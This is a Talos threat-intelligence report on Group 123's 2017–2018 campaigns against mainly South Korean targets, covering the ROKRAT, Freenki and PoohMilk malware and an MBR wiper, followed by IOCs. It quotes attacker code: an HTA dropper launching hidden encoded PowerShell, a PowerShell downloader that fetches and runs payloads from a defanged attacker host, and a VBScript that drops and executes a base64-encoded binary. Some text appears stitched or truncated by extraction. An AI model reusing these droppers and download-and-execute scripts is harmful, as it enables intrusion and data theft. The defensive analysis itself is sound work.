{ "id": "59e4ec36-9432-4984-aab3-b31fa30bb022", "created_at": "2026-04-06T00:18:40.830911Z", "updated_at": "2026-04-10T03:38:06.479674Z", "deleted_at": null, "sha1_hash": "7da818fc54818da4536f98203ef35f39940ca222", "title": "Korea In The Crosshairs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2658004, "plain_text": "Korea In The Crosshairs\r\nBy Paul Rascagneres\r\nPublished: 2018-01-16 · Archived: 2026-04-02 11:28:13 UTC\r\nThis blog post is authored by Warren Mercer and Paul Rascagneres and with contributions from Jungsoo An.\r\n A one year review of campaigns performed by an actor with multiple campaigns mainly linked to South Korean\r\ntargets.\r\nExecutive Summary\r\nThis article exposes the malicious activities of Group 123 during 2017. We assess\r\nwith high confidence that Group 123 was responsible for the following six\r\ncampaigns:\r\n\"Golden Time\" campaign.\r\n\"Evil New Year\" campaign.\r\n\"Are you Happy?\" campaign.\r\n\"FreeMilk\" campaign.\r\n\"North Korean Human Rights\" campaign.\r\n\"Evil New Year 2018\" campaign.\r\nOn January 2nd of 2018, the \"Evil New Year 2018\" was started. This campaign copies the approach of the\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 1 of 29\n\n2017 \"Evil New Year\" campaign.\r\nThe links between the different campaigns include shared code and compiler artifacts such as PDB (Program\r\nDataBase) patterns which were present throughout these campaigns.\r\nBased on our analysis, the \"Golden Time\", both \"Evil New Year\" and the \"North Korean Human Rights\"\r\ncampaigns specifically targeted South Korean users. The attackers used spear phishing emails combined with\r\nmalicious HWP documents created using Hancom Hangul Office Suite. Group 123 has been known to use exploits\r\n(such as CVE-2013-0808) or scripting languages harnessing OLE objects. The purpose of the malicious\r\ndocuments was to install and to execute ROKRAT, a remote administration tool (RAT). On occasion the attackers\r\ndirectly included the ROKRAT payload in the malicious document and during other campaigns the attackers\r\nleveraged multi-stage infection processes: the document only contained a downloader designed to download\r\nROKRAT from a compromised web server.\r\nAdditionally, the \"FreeMilk\" campaign targeted several non-Korean financial institutions. In this campaign, the\r\nattackers made use of a malicious Microsoft Office document, a deviation from their normal use of Hancom\r\ndocuments. This document exploited a newer vulnerability, CVE-2017-0199. Group 123 used this vulnerability\r\nless than one month after its public disclosure. During this campaign, the attackers used 2 different malicious\r\nbinaries: PoohMilk and Freenki. PoohMilk exists only to launch Freenki. Freenki is used to gather information\r\nabout the infected system and to download a subsequent stage payload. This malware was used in several\r\ncampaigns in 2016 and has some code overlap with ROKRAT.\r\nFinally, we identified a 6th campaign that is also linked to Group 123. We named this 6th campaign \"Are You\r\nHappy?\". In this campaign, the attackers deployed a disk wiper. The purpose of this attack was not only to gain\r\naccess to the remote infected systems but to also wipe the first sectors of the device. We identified that the wiper is\r\na ROKRAT module.\r\nThis actor was very active this year and continued to mainly focus on South Korea. The group leveraged spear\r\nphishing campaigns and malicious documents the contents of which included very specific language suggesting\r\nthat they were crafted by native Korean speakers rather than through the use of translation services. The actor has\r\nthe following demonstrated capabilities:\r\nTo include exploits (for Hangul and Microsoft Office) in its workflows.\r\nTo modify its campaigns by splitting the payload in to multiple stages\r\nTo use compromised web servers or legitimate cloud based platforms.\r\nTo use HTTPS communications to make it harder to perform traffic analysis.\r\nTo compromise third parties to forge realistic spear phishing campaigns (i.e. Yonsei university in the\r\n\"Golden Time\" campaign).\r\nTo constantly evolve, the new fileless capability included in 2018 is a proof.\r\nThe Timeline\r\nHere is the timeline for 2017 and the beginning of 2018:\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 2 of 29\n\nAugust 2016 to March 2017: \"Golden Time\" Campaign\r\nAs with the majority of Group 123 campaigns, the initial attack vector during this\r\ncampaign was spear phishing. Talos identified two different kinds of emails. The\r\nfirst email we discovered was the most interesting. In this sample, we observed the\r\nattackers praising the user for joining a panel related to the \"Korean\r\nReunification and North Korean Conference\". The text in the email explained that\r\nthe recipient should complete the attached document to provide necessary\r\nfeedback. This appears to be a non-existent conference. The closest match we\r\nidentified related to any Unification conference was held in January 2017, which\r\nwas the NYDA Reunification conference. The sender was 'kgf2016@yonsei.ac.kr'\r\nwhich is the contact email of the Korea Global Forum, a separate conference.\r\nWhen we analyzed the email headers, we determined that the email was sent from an SMTP server using an IP\r\nassociated with the Yonsei University network. We believe that the email address was compromised and abused by\r\nthe attackers to send the email used in this campaign.\r\nThe filename for the malicious attachment translates as 'Unification North Korea Conference _ Examination\r\nDocuments' which reinforces the text in the email about the reunification conference. For an added bonus, in the\r\nbody of the email, the attacker even suggests that people who completed the document would get paid a 'small\r\nfee'. Perhaps the gift of embedded malware is the payment:\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 3 of 29\n\nMuch less effort was used to craft the second email Talos analyzed. The email was from a free Korean mail\r\nservice provided by Daum, Hanmail, indicating that there was no attempt to try to appear as if it originated from\r\nan official body or person, unlike the previous email described. The subject was simply 'Request Help' while the\r\nattachment filename was 'I'm a munchon person in Gangwon-do, North Korea'. We suspect the attacker was trying\r\nto generate sympathy by reminding the reader that Munchon and the province it is in, Kangwon, were part of a\r\nunified province that included South Korea's Gangwon-do prior to the division of Korea in 1945.\r\nA second email contained a story about a person called 'Ewing Kim' who was looking for help:\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 4 of 29\n\nThe email's attachments are two different HWP documents, both leveraging same vulnerability (CVE-2013-0808).\r\nThis vulnerability targets the EPS (Encapsulated PostScript) format. The purpose of the shellcode is to download a\r\npayload from the Internet. The first email displays the following decoy document to the infected user and\r\ndownload the following payload:\r\nhxxp://discgolfglow[.]com:/wp-content/plugins/maintenance/images/worker.jpg\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 5 of 29\n\nThe second email displays the following decoy document to the infected user and downloads the following\r\npayload:\r\nhxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpg\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 6 of 29\n\nIn both cases, the downloaded payload is the ROKRAT malware.\r\nThe first tasks of this variant of ROKRAT is to check the operating system version. If Windows XP is detected,\r\nthe malware executes an infinite loop. The purpose is to generate empty reports if opened on sandbox systems\r\nrunning Windows XP machines. Additionally it checks to determine if common analysis tools are currently\r\nrunning on the infected system. If it detects the presence of these tools, the malware performs two network\r\nrequests to legitimate websites:\r\nhxxps://www[.]amazon[.]com/Men-War-PC/dp/B001QZGVEC/EsoftTeam/watchcom.jpg\r\nhxxp://www[.]hulu[.]com/watch/559035/episode3.mp4\r\nThe Amazon URL displays a WWII game called 'Men of War' while the Hulu URL attempts to stream a\r\nJapanese anime show called 'Golden Time':\r\nOne of the identifying characteristics of ROKRAT is the fact that it uses social network and cloud platforms to\r\ncommunicate with the attackers. These platforms are used to exfiltrate documents and receive instructions. Here is\r\na list of the platforms used by this variant: Twitter, Yandex and Mediafire. The tokens for each platform are\r\nhardcoded within the sample:\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 7 of 29\n\nThe documents sent to the targets were titled \"Analysis of \"Northern New Year in 2017\" and used the official logo\r\nof the Korean Ministry of Unification. This is a simple choice for the actor to make, but it further shows their\r\nfamiliarity with the region.\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 8 of 29\n\nThe document claimed to discuss the New Year's activities of North Korea and this would have been something\r\nthat the victims in South Korea would be very interested in. This would have been particularly true for\r\nGovernment targets, who we believe to be Group123's target of choice.\r\nThis document was a decoy aimed to entice the user to open malicious documents embedded further down the\r\npage\r\nThe actor embedded two additional links and the document urged the user to click on these links for more\r\ninformation about New Year's activities in North Korea. The first link was labeled as \"Comparison of Major Tasks\r\nin '16 \u0026 '17\" and the second link was identified as \"Comparison between '16 \u0026 '17\".\r\nUpon opening these links the user was presented with a further decoy Hangul document. This document was well\r\nwritten and further increases our confidence that we are dealing with a new Korean actor. These documents\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 9 of 29\n\ncontained malicious OLE objects used to drop binaries.\r\nThis time, however, they contained malicious OLE (Object Link Embedded) objects.\r\nInitial analysis confirmed two similarly sized OLE object files within this document which appeared to be the\r\nsame from an execution point of view.\r\nThe two dropped binaries were stored and executed in this location during our analysis:\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 10 of 29\n\nC:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Hwp (2).exe\r\nC:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Hwp (3).exe\r\nInitial analysis showed some sloppy cleaning up from Group123, which we used later to determine that\r\nseparate campaigns were the work of this same actor, as compilation artifacts remained within the binaries:\r\ne:\\Happy\\Work\\Source\\version 12\\T+M\\Result\\DocPrint.pdb\r\nThe second stage of the dropped binaries was used to execute wscript.exe while injecting shellcode into\r\nthis process. The shellcode is embedded within the resource 'BIN' and is used to unpack another PE32\r\nbinary and use wscript.exe to execute it. To do this, Group123 uses a well-known technique that harnesses\r\nVirtualAllocEx(), WriteProcessMemory() and CreateRemoteThread() Windows API calls.\r\nThe new PE32 unpacked from the shellcode is an initial reconnaissance malware which is used to communicate\r\nwith the C2 infrastructure to obtain the final payload. The information this malware collected included the\r\nfollowing:\r\nThe computer name\r\nThe username\r\nThe execution path of the sample\r\nThe BIOS model\r\nA randomly-generated ID to uniquely identify the system\r\nGroup123 utilized this method to ensure their victim was (a) someone they wanted to target further and (b)\r\nsomeone they could infect further based on the information obtained from the reconnaissance phase.\r\nFurther network analysis showed that the binary attempted to connect to the following URLs:\r\nwww[.]kgls[.]or[.]kr/news2/news_dir/index.php\r\nwww[.]kgls[.]or[.]kr/news2/news_dir/02BC6B26_put.jpg\r\nKorean Government Legal Services (KGLS) is a legitimate Korean government body that manages Korean\r\ngovernment legal affairs. By compromising the KGLS, the attacker gained a trusted platform from which\r\nto execute an attack.\r\nThe initial network connection is to 'index.php'. This connection transmits the information gathered during the\r\nreconnaissance phase. The attacker uses this information to then determine the specific filename (based on the\r\nrandom ID) to serve to the infected victim. In our case this was 02BC6B26 - this meant a file\r\n\"02BC6B26_put.jpg\" was created for us on the attackers C2. This file is then dropped and renamed\r\n'officepatch.exe' on the victim's machine. Because the attacker was careful about who they attacked, we were\r\nunable to obtain this file during our analysis.\r\nDuring our investigation we were able to identify additional Command and Control infrastructure used by this\r\nactor. Four C2s were observed, based in the following countries:\r\n3 C2 in South Korea\r\n1 C2 in the Netherlands\r\nHere is a global map of the identified infrastructure:\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 11 of 29\n\nContrary to the previous campaign, the attackers separated the reconnaissance phase from the main ROKRAT\r\npayload. This trick was likely used to avoid detection. This is an interesting adaptation in Group 123's behavior.\r\nMarch 2017: \"Are You Happy?\" Campaign\r\nIn March 2017, Group 123 compiled a disk wiper. The malware contains 1\r\nfunction, the purpose is to open the drive of the infected system (\\\\.\\PhysicalDrive0)\r\nand write the following data to the MBR:\r\nYou can see the \"Are you Happy?\" string in the written buffer. After writing to the MBR, the malware reboots the\r\nmachine with the following command: c:\\windows\\system32\\shutdown /r /t 1\r\nAfter the reboot, the MBR displays the following string to the user:\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 12 of 29\n\n---\ntitle: Bonjour\n---\nThe link to the other campaigns was the following PDB path:\nD:\\HighSchool\\version 13\\VC2008(Version15)\\T+M\\T+M\\TMProject\\Release\\ErasePartition.pdb\nAs you can see, it perfectly matches the ROKRAT PDB. This wiper is a ROKRAT module named\nERSP.enc. We assume that ERSP means ERaSePartition. This module can be downloaded and executed on\ndemand by Group 123.\nThis sample is interesting considering the attack in December 2014 against a Korean power plant where the\nmessage that was displayed by the wiper was \"Who Am I?\".\nMay 2017: \"FreeMilk\" Campaign\nThis campaign targeted non-Korean financial institutions, but unlike the other\ncampaigns, this one does not use HWP documents. It instead uses Office\ndocuments. This change is because Group 123 did not target South Korea during\nthis campaign and Microsoft Office is standard in the rest of the world.\nInfection Vectors\nThe attackers exploited CVE-2017-0199 in order to download and execute a malicious HTA\ndocument inside of Microsoft Office. The URL used can be found in the embedded OLE object:\nhxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]\nHere is the source code of the downloaded HTA document:\nUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transiti\n\nSet v1ymUkaljYF = CreateObject(\"Scripting.FileSystemObject\")\r\nIf v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings(\"%PSModulePath%\") + \"..\\powershell.exe\") Then\r\nowFrClN0giJ.Run \"powershell -nop -windowstyle hidden -executionpolicy bypass -encodedcommand JABjAD0AbgBlAHcALQB\r\nowFrClN0giJ.Run \"cmd /c echo hta\u003e%tmp%\\webbrowser1094826604.tmp\", 0\r\nEnd If\r\nSelf.Close\r\n\u003c/script\u003e\r\n\u003chta:application\r\nid=\"oHTA\"\r\napplicationname=\"Bonjour\"\r\napplication=\"yes\"\r\n\u003e\r\n\u003c/head\u003e\r\n\u003c/html\u003e\r\nOnce decoded using the base64 algorithm, we are able to read the final payload:\r\n$c=new-object System.Net.WebClient\r\n$t =$env:temp\r\n$t1=$t+\"\\\\alitmp0131.jpg\"\r\n$t2=$t+\"\\\\alitmp0132.jpg\"\r\n$t3=$t+\"\\\\alitmp0133.js\"\r\ntry\r\n {\r\n echo $c.DownloadFile( \"hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg\",$t1)\r\n $c.DownloadFile( \"hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg\",$t2)\r\n $c.DownloadFile( \"hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp\",$t3)\r\n wscript.exe $t3\r\n }\r\ncatch\r\n {\r\n }\r\nThe purpose of this script is to download and execute a Windows script and two encoded payloads. The script is\r\nused to decode and execute the following payloads:\r\nAppach01.jpg (renamed: Windows-KB275122-x86.exe) is a Freenki sample.\r\nAppach01.jpg (renamed: Windows-KB271854-x86.exe) is a PoohMilk sample.\r\nPoohMilk Analysis\r\nThe PoohMilk sample is designed to perform two actions:\r\nCreate persistence to execute the Freenki sample at the next reboot.\r\nCheck specific files on the infected machine.\r\nThe first action is to create a registry key in order to execute the Windows-KB275122-x86.exe file\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 14 of 29\n\npreviously downloaded. The file is executed with the argument: \"help\". Here is the registry creation:\r\nThe registry location where persistence is achieved is:\r\nHKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Windows Update. At the next reboot, the malware will\r\nbe executed.\r\nThe second action is to check if the file \"wsatra.tmp\" exists in the temporary directory of the current user. If this\r\nfile exists, the content is read in order to obtain a path to find a second file with the LNK (link) extension. The\r\nLNK file is finally used to identify a third file: a ZIP file. The file will be inflated in order to retrieve a RTF\r\ndocument, this document will be displayed to the infected user by executing Wordpad.\r\nHere is the PDB path from the PoohMilk sample:\r\nE:\\BIG_POOH\\Project\\milk\\Release\\milk.pdb\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 15 of 29\n\nFreenki Sample\r\nThe purpose of Freenki is to collect information on the infected system and to download a third\r\nexecutable.\r\nThis sample can be executed with 3 different arguments:\r\n\"Help\": the value configured by PoohMilk. In this context the main function is executed.\r\n\"Console\": with the argument, a persistence is configured and the malware will be executed at the next\r\nreboot ( HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\runsample ).\r\n\"Sample\": with this argument, the malware executes the console command followed by the help command.\r\nThe information collected is performed using WMI queries:\r\nAdditionally the malware lists the running process via the Microsoft Windows API. The malware uses obfuscation\r\nin order to hide strings such as URL or User-Agent, the algorithm is based on bitwise (SUB 0x0F XOR 0x21),\r\nhere is the decoded data:\r\nhxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.php\r\nMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET\r\nCLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E;\r\nInfoPath.3)\r\nThe downloaded third payload is obfuscated using the same technique. The file is a fake image starting\r\nwith \"PNGF\".\r\nNovember 2017: \"North Korean Human Rights\" Campaign\r\nIn November 2017, Talos observed the latest Group123 campaign of the year,\r\nwhich included a new version of ROKRAT being used in the latest wave of attacks.\r\nGroup 123 again used one of their main calling cards, the malicious HWP\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 16 of 29\n\ndocument. This time, Group 123 used a document containing information in\r\nrelation to a meeting held on 1st November in Seoul, South Korea. This document\r\nwas alleged to have been written by a legal representative claiming to be\r\nrepresenting the \"Citizens' Alliance For North Korean Human Rights And\r\nReunification Of Korean Peninsula\". Group 123 once again uses information\r\nrelated to the Korean unification and now are claiming to highlight concerns\r\nrelated to human rights issues.\r\nThe document brought Talos a new gift - a new version of ROKRAT. Following on with the normal Group 123\r\nactivity the document was written in perfect Korean text and dialect again suggesting the origin of this group is\r\nfrom the Korean peninsula.\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 17 of 29\n\nFurther analysis of the document text allowed us to understand the context. The document mentions 'Community\r\nof North Korean human rights and unification' with the lawyer claiming to be part of the \"Citizen's Alliance for\r\nNorth Korean Human Rights and North-South unification\". The main purpose of this document was an attempt to\r\narrange a meeting to discuss items related to \"North Korean Human Rights Act\" and \"Enactment of a Law\" which\r\nwas passed in 2016 in South Korea. We believe that the document was attempting to target stakeholders within the\r\n'올인통' community in an attempt to entice them to join the discussion in an attempt to work on additional ideas\r\nrelated to these activities. The meeting was due to take place on November 1, 2017 and this document was trying\r\nto garner additional interest prior to the meeting.\r\nOnce again Group 123 leveraged the use of OLE objects within the HWP document. Analysis starts with a zlib\r\ndecompression (a standard action of HWP documents) and we're able to recover the following script:\r\nconst strEncode = \"TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4A\r\nDIM outFile\r\nDIM base64Decoded\r\nDIM shell_obj\r\nSET shell_obj = CreateObject(\"WScript.Shell\")\r\nDIM fso\r\nSET fso = CreateObject(\"Scripting.FileSystemObject\")\r\noutFile = \"c:\\ProgramData\\HncModuleUpdate.exe\"\r\nbase64Decoded = decodeBase64(strEncode)\r\nIF NOT(fso.FileExists(outFile)) then\r\nwriteBytes outFile, base64Decoded\r\nshell_obj.run outFile\r\nEND IF\r\nWScript.Quit()\r\nprivate function decodeBase64(base64)\r\nDIM DM, EL\r\nSET DM = CreateObject(\"Microsoft.XMLDOM\")\r\nSET EL = DM.createElement(\"tmp\")\r\nEL.DataType = \"bin.base64\"\r\nEL.Text = base64\r\ndecodeBase64 = EL.NodeTypedValue\r\nend function\r\nprivate Sub writeBytes(file, bytes)\r\nDIM binaryStream\r\nSET binaryStream = CreateObject(\"ADODB.Stream\")\r\nbinaryStream.Type = 1\r\nbinaryStream.Open\r\nbinaryStream.Write bytes\r\nbinaryStream.SaveToFile file, 1\r\nEnd Sub\r\nThis script is executed and is used to decode a static base64 string within the strEncode variable. Using base64\r\nencoding the decoded binary is stored as HncModuleUpdate.exe and is then executed. This is the ROKRAT\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 18 of 29\n\ndropper. Talos suspect the filename may have been selected to make it appear within running processes as a\r\npotential Hancom updater.\r\nThe dropper is used to extract a new resource named SBS. This specific resource contains malicious shellcode\r\nused by the malware. Additionally we see a cmd.exe process launched and used for process injection using the\r\nVirtualAlloc(), WriteProcessMemory() and CreateRemoteThread() Windows APIs, as with the first finding of\r\nROKRAT they continue to use similar Windows APIs. The following graph view from IDA shows these steps.\r\nThese execution steps allow the launch of the new ROKRAT variant by decoding the PE binary and injecting into\r\nthe cmd.exe process.\r\nOne of Group 123 oddities in this campaign was to drop the following picture as a decoy image to the user. This\r\nimage shows various publicly available images which look to be related to the Korean 'Independence Movement'\r\nand appear to be related to the Korean war.\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 19 of 29\n\nWe began performing further in-depth analysis on this new version of ROKRAT and this is where we started to\r\nnotice some similarities with Group 123s \"Evil New Years\" campaign. The similitudes are discussed later in this\r\npaper.\r\nThis ROKRAT variant contained anti-sandbox techniques. This is performed by checking if the following libraries\r\nare loaded on the victim machine.\r\nSbieDll.dll (sandboxie library)\r\nDbghelp.dll (Microsoft debugging tools)\r\nApi_log.dll (threatAnalyzer / GFI SandBox)\r\nDir_watch.dll (threatAnalyzer / GFI SandBox)\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 20 of 29\n\nWe were able to uncover some other techniques used by this variant of ROKRAT to make analysis difficult, Group\r\n123 used an anti-debugging technique related to NOP (No Operation).\r\nnop dword ptr [eax+eax+00h] is a 5 byte NOP. But this opcode is not correctly supported by some debugging\r\ntools, Immunity Debugger for example, will replace the assembly by \"???\" in red making it difficult to attempt to\r\ndebug.\r\nThis version of ROKRAT came with a Browser Stealer mechanism which was similar, with a few modifications,\r\nto that used in the FreeMilk campaign using Freenki malware in 2016.\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 21 of 29\n\nGroup 123 continued their use of Cloud platforms with this campaign, this time leveraging pCloud, Dropbox, Box\r\nand Yandex.\r\nFinally here is the PDB of the sample used during this campaign:\r\nd:\\HighSchool\\version 13\\2ndBD\\T+M\\T+M\\Result\\DocPrint.pdb\r\nJanuary 2018: \"Evil New Year 2018\" Campaign\r\nAs we observed at the beginning of 2017, Group 123 started a campaign\r\ncorresponding with the new year in 2018. This campaign started on the 2nd of\r\nJanuary. The infection vector was a malicious HWP document:\r\nThis decoy document is an analysis of the 2018 New Year speech made by the leader of North Korea. The\r\napproach is exactly the same as what was seen in 2017 using a new decoy document. This document was alleged\r\nto have been written by the Ministry of Reunification as demonstrated by the logo in the top left.\r\nSimilar to the \"Golden Time\" campaign, this document exploits an EPS vulnerability in order to download and\r\nexecute shellcode located on a compromised website:\r\nhxxp://60chicken[.]co[.]kr/wysiwyg/PEG_temp/logo1.png\r\nThe fake image usage is a common pattern for this group. This image contains shellcode used to decode the\r\nembedded final payload: ROKRAT. This ROKRAT variant is loaded from memory. It's a fileless version of\r\nROKRAT. This behavior shows that Group 123 is constantly evolving to avoid detection. As usual, the ROKRAT\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 22 of 29\n\nsample uses cloud providers to communicate with the operator, this time leveraging Yandex, pCloud, Dropbox and\r\nBox.\r\nLinks Between Campaigns\r\nCode Sharing\r\nTalos has identified that Group 123 shares code between different malware. Several features are\r\nshared in the samples mentioned in this article; however we will cover only two in this article: the\r\nreconnaissance phase and the browsers stealer.\r\nReconnaissance Phase\r\nThe ROKRAT samples used during the two \"Evil New Year\" and the \"North Korean Human Rights\"\r\ncampaigns contained a reconnaissance phase. In the \"Evil New Year\" campaign the payload was split into\r\ntwo parts, the first part contained the reconnaissance code. In the other campaign the reconnaissance phase\r\nwas directly included in the main payload. This code is the same.\r\nThe malware uses the following registry key to get the machine type:\r\nHKLM\\System\\CurrentControlSet\\Services\\mssmbios\\Data\\SMBiosData. The \"System manufacturer\" value is\r\nused to identify the type of machine. The code appears to be based on a forum post (rohitab.com) describing the\r\nuse of the Win32 APIs used. The source code only considers the following machine types:\r\ndefault: lpString = \"(Other)\"; break;\r\ncase 0x02: lpString = \"(Unknown)\"; break;\r\ncase 0x03: lpString = \"(Desktop)\"; break;\r\ncase 0x04: lpString = \"(Low Profile Desktop)\"; break;\r\ncase 0x06: lpString = \"(Mini Tower)\"; break;\r\ncase 0x07: lpString = \"(Tower)\"; break;\r\ncase 0x08: lpString = \"(Portable)\"; break;\r\ncase 0x09: lpString = \"(Laptop)\"; break;\r\ncase 0x0A: lpString = \"(Notebook)\"; break;\r\ncase 0x0E: lpString = \"(Sub Notebook)\"; break;\r\nThe string format - with the () - and the considering types are exactly the same as those used in the ROKRAT\r\nsamples.\r\nIt's interesting to note that this reconnaissance phase was not included in the ROKRAT variant used during the\r\n\"Golden Time\" campaign.\r\nBrower Stealer\r\nFor the first time, the ROKRAT sample used during the \"North Korean Human Rights\" contained a\r\nbrowser credentials stealer. The code used to perform this task in the same that found within in a Freenki\r\nsample deployed in 2016.\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 23 of 29\n\nThe malware is able to extract the stored passwords from Internet Explorer, Chrome and Firefox. For Chrome and\r\nFirefox, the malware queries the sqlite database containing the URL, username and password:\r\nAdditionally, they support the Microsoft Vault mechanism. Vault was implemented in Windows 7, it contains any\r\nsensitive data (like the credentials) of Internet Explorer. Here is the initialization of the Vault APIs:\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 24 of 29\n\nOn the left, we have the ROKRAT sample and on the right the FreeMilk sample. You can see that in addition to\r\nthe code, the author copy-pasted English typos such as \"IE Registery\":\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 25 of 29\n\nPDB Paths\r\nWe can clearly identify a pattern in the PDB naming convention of all the binaries mentioned in\r\nthis article.\r\nROKRAT:\r\ne:\\Happy\\Work\\Source\\version 12\\T+M\\Result\\DocPrint.pdb (from the \"Evil New Year\" campaign)\r\nd:\\HighSchool\\version 13\\2ndBD\\T+M\\T+M\\Result\\DocPrint.pdb (from the \"North Korean Human\r\nRights\" campaign\r\nD:\\HighSchool\\version 13\\First-Dragon(VS2015)\\Sample\\Release\\DogCall.pdb (ROKRAT Sample from\r\nan unidentified campaign from June) Wiper:\r\nD:\\HighSchool\\version 13\\VC2008(Version15)\\T+M\\T+M\\TMProject\\Release\\ErasePartition.pdb (From\r\nthe \"Are You Happy?\" campaign)\r\nSummary Graph\r\nHere is a graph to visualize the similarities and differences between each campaign\r\nmentioned in this article:\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 26 of 29\n\nConclusion\r\nSouth Korea is becoming an important target for malicious actors and the\r\ntechniques used are becoming specific to the region (for example: use of native\r\nlanguage to try and ensure the targets feel that the information, document or email\r\nbeing sent to them has added legitimacy). In a specific campaign, this actor took\r\ntime to compromise multiple legitimate Korean platforms including Yonsei and the\r\nKGLS in order to forge the spear phishing campaign or to host the command and\r\ncontrol. This approach is not common with less advanced actors and demonstrates\r\na high level of maturity and knowledge of the Korean region.\r\nHowever Group 123's activities are not limited to South Korea. For international targets, they are able to switch to\r\na more standard attack vector such as using Microsoft Office documents as opposed to the specific HWP\r\ndocuments used when targeting victims located in Korea. Group 123 does not hesitate to use public exploits and\r\nscripting languages to drop and execute malicious payloads. We can notice that this group uses compromised\r\nlegitimate websites (mainly Wordpress) and cloud platforms to communicate with the infected systems. This\r\napproach makes it difficult to detect communications through analysis of these network flows. Even if the arsenal\r\nof this actor is diverse, we have identified some patterns, copy-paste code from various public repositories and\r\nsimilarities between the different piece of code. In addition to the Remote Administration Tools, we identified a\r\nwiper. We conclude that this group was involved in a campaign of intelligence gathering and finally attempted\r\ndestruction.\r\nWith our current knowledge of this actor, we predict that they will not disappear anytime soon and will continue to\r\nbe active during the coming years. Group 123 is constantly evolving as the new fileless capability that was added\r\nto ROKRAT demonstrates. We also believe their target profile may change but for now it will mostly focus on\r\nKorean peninsula targets, however, as explained their capabilities will likely continue to evolve over time as they\r\nfurther refine their TTPs.\r\nIOCs\r\n\"Golden Time\" Campaign:\r\nMaldoc #1 sha256: 7d163e36f47ec56c9fe08d758a0770f1778fa30af68f39aac80441a3f037761e\r\nhttp://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html\r\nPage 27 of 29\n\nMaldoc #2 sha256: 5441f45df22af63498c63a49aae82065086964f9067cfa75987951831017bd4f\r\nROKRAT #1: cd166565ce09ef410c5bba40bad0b49441af6cfb48772e7e4a9de3d646b4851c\r\nROKRAT #1: 051463a14767c6477b6dacd639f30a8a5b9e126ff31532b58fc29c8364604d00\r\nNetwork:\r\nMalicious URLs:\r\n- hxxp://discgolfglow[.]com/wp-content/plugins/maintenance/images/worker.jpg\r\n- hxxp://acddesigns[.]com[.]au/clients/ACPRCM/kingstone.jpg\r\nSafe URLs:\r\n- hxxps://www[.]amazon[.]com/Men-War-PC/dp/B001QZGVEC/EsoftTeam/watchcom.jpg\r\n- hxxp://www[.]hulu[.]com/watch/559035/episode3.mp4\r\n\"Evil New Year\" Campaign:\r\nMaldoc sha256: 281828d6f5bd377f91c6283c34896d0483b08ac2167d34e981fbea871893c919\r\nDropped #1: 95192de1f3239d5c0a7075627cf9845c91fd397796383185f61dde893989c08a\r\nDropped #2: 7ebc9a1fd93525fc42277efbccecf5a0470a0affbc4cf6c3934933c4c1959eb1\r\nDropped #3: 6c372f29615ce8ae2cdf257e9f2617870c74b321651e9219ea16847467f51c9f\r\nDropped #4: 19e4c45c0cd992564532b89a4dc1f35c769133167dc20e40b2a41fccb881277b\r\nDropped #5: 3a0fc4cc145eafe20129e9c53aac424e429597a58682605128b3656c3ab0a409\r\nDropped #6: 7d8008028488edd26e665a3d4f70576cc02c237fffe5b8493842def528d6a1d8\r\nUnpacked #1: 7e810cb159fab5baccee7e72708d97433d92ef6d3ef7d8b6926c2df481ccac2f\r\nUnpacked #1: 21b098d721ea88bf237c08cdb5c619aa435046d9143bd4a2c4ec463dcf275cbe\r\nUnpacked 